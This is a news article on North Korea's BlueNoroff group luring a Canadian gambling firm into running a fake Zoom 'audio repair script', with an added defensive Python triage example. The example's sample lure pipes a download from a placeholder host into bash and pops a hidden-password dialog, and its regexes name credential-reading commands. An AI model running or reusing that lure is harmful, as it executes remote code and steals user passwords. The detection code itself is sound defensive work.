A representative from a Canadian online gambling firm thought they were having a standard Zoom call with a familiar contact but was, in fact, conversing with North Korean hackers on a fake version of the platform.
Field Effect Analysis reported that on May 28, the unnamed company was targeted by BlueNoroff, a subgroup of the infamous Lazarus Group, which is supported by North Korea.
BlueNoroff is a financially driven threat actor that usually focuses on banks and cryptocurrency exchanges, along with gaming and entertainment sectors, and financial technology firms, to generate income for North Korea.
The gang has taken over US$1.3 billion since 2017, primarily via SWIFT banking thefts and cryptocurrency heists.
Field Effect reported that BlueNoroff set up a fraudulent website mimicking an authentic Zoom support page to attack the gaming firm. The assailants impersonated an actual business associate and arranged a Zoom meeting with the target utilizing deepfake technology.
In the Zoom meeting, the hackers pretended to have "audio issues," and the victim was instructed to execute a "Zoom audio repair script" to resolve the situation. However, the script was malicious software.
Upon execution, the script initiated a series of downloads and commands, asking the user for system credentials and quietly installing several malicious payloads. This enabled the attackers to obtain various sensitive personal and system information, particularly targeting cryptocurrency-related assets and messaging data.
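The lure described above, a "repair script" that fetches further stages from a non-Zoom host and prompts the user for credentials, has a recognisable shape that endpoint teams can triage before a script is run. The following is an added example written for this page; it is not code from Field Effect, from the article, or from the malware itself. The allowlist, the heuristic patterns and the two sample scripts (including the placeholder domain) are constructed assumptions for illustration, not indicators from the incident.

```python
"""Heuristic triage of a shell script handed to a user as a 'support fix'.

Flags three traits the article attributes to the fake Zoom audio script:
downloads from a host that is not the vendor's, piping remote content
straight into a shell, and prompting for user credentials.
"""
import re
from urllib.parse import urlparse

# Constructed allowlist: hosts that a genuine Zoom repair script may fetch from.
# A real deployment would maintain its own list per vendor.
TRUSTED_HOSTS = {"zoom.us"}

# curl/wget followed (on the same command) by an http(s) URL.
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b[^\n|;]*?(https?://[^\s\"'|;]+)", re.I)
# Remote content piped directly into sh / bash / zsh, optionally via sudo.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b")
# Common ways a script collects a password: macOS hidden-answer dialog,
# silent shell reads, sudo reading from stdin, or Keychain queries.
CRED_PROMPT_RE = re.compile(
    r"(with hidden answer|read\s+-s\b|sudo\s+-S\b|security\s+find-generic-password)", re.I
)


def host_is_trusted(url: str, trusted=TRUSTED_HOSTS) -> bool:
    """True only if the URL's host is a trusted domain or a subdomain of one.

    Suffix matching on '.' + domain stops look-alikes such as
    zoom.us.evil.example from passing.
    """
    host = (urlparse(url).hostname or "").lower()
    return any(host == t or host.endswith("." + t) for t in trusted)


def triage_script(text: str, trusted=TRUSTED_HOSTS) -> list[str]:
    """Return a list of human-readable findings for one script body."""
    findings = []
    for match in DOWNLOAD_RE.finditer(text):
        url = match.group(2)
        if not host_is_trusted(url, trusted):
            findings.append(f"download from untrusted host: {urlparse(url).hostname}")
    if PIPE_TO_SHELL_RE.search(text):
        findings.append("remote content piped straight into a shell")
    if CRED_PROMPT_RE.search(text):
        findings.append("prompts for or reads user credentials")
    return findings


def verdict(text: str, trusted=TRUSTED_HOSTS) -> str:
    """Collapse findings into clean / review / suspicious for a help-desk queue."""
    findings = triage_script(text, trusted)
    if not findings:
        return "clean"
    return "suspicious" if len(findings) >= 2 else "review"


# Constructed sample 1: a plausible local-only audio fix with nothing to flag.
BENIGN_SCRIPT = """#!/bin/bash
# restart the local audio daemon (macOS)
sudo killall coreaudiod
"""

# Constructed sample 2: modelled on the lure the article describes.
# The domain is a placeholder, not an indicator from the incident.
LURE_SCRIPT = """#!/bin/bash
echo "Repairing Zoom audio..."
curl -fsSL https://support-zoom.example/fix_audio.sh | bash
osascript -e 'display dialog "Zoom needs your password to repair audio" default answer "" with hidden answer'
"""

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_SCRIPT), ("lure", LURE_SCRIPT)):
        print(name, "->", verdict(body), triage_script(body))
```

The heuristics are deliberately coarse: the point is to route a user-supplied "fix" to a human reviewer before it runs, not to replace endpoint protection. A script that legitimately needs elevated rights would still be caught by the credential pattern and land in the review queue, which is the intended outcome for anything a stranger on a video call asks an employee to execute.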
According to Field Effect, the assault seems to be a component of a wider Zoom impersonation effort initially detected in March 2025 that has primarily focused on cryptocurrency firms.
“It exemplifies an evolving pattern in which financially motivated threat actors continue refining their tradecraft, embedding malicious activity within legitimate business workflows and exploiting user trust as the primary attack surface,” the analysts wrote.
BlueNoroff achieved its most infamous milestone in February 2016, when the group effectively implanted malware into the servers of Bangladesh Bank. This enabled them to secure credentials allowing 35 transfer requests from the New York Fed to accounts in the Philippines and Sri Lanka, amounting to nearly $1 billion.
Out of the 35 payments, five, amounting to US$101 million, were executed before an employee at the New York Fed noticed something suspicious and halted additional transactions.
Approximately $20 million flowed into Sri Lanka and was swiftly reclaimed. The remainder was moved to four accounts at the Philippine bank RCBC, which had been opened that same day using fake identities. From that point, it found its way into the loosely regulated Philippine casino sector, where it was laundered at VIP gaming tables before vanishing without a trace.